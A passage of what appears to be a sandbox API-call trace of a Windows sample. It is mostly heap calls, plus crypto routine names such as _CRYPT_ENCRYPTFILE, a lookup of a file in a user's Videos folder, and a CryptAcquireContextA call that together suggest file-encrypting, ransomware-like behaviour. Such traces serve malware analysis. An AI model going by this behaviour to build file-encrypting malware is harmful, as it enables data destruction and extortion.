dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0101.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0101.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0101.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0101.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0101.382] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0101.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0101.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0101.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0101.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0101.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0101.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0101.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0101.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0101.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0101.420] CloseHandle (hObject=0x298) returned 1 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0101.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0101.421] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0101.421] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0101.421] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0101.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0101.423] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0101.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.424] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c544b70, ftCreationTime.dwHighDateTime=0x1d5efa5, ftLastAccessTime.dwLowDateTime=0xf9905a0, ftLastAccessTime.dwHighDateTime=0x1d5ec16, ftLastWriteTime.dwLowDateTime=0xf9905a0, ftLastWriteTime.dwHighDateTime=0x1d5ec16, nFileSizeHigh=0x0, nFileSizeLow=0x8e18, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="GPtGPTImgDjIi0576udd.swf", cAlternateFileName="GPTGPT~1.SWF")) returned 0x41ac780 [0101.424] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.425] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0101.425] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0101.425] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0101.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.425] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0101.426] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0101.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0101.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.427] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0101.428] 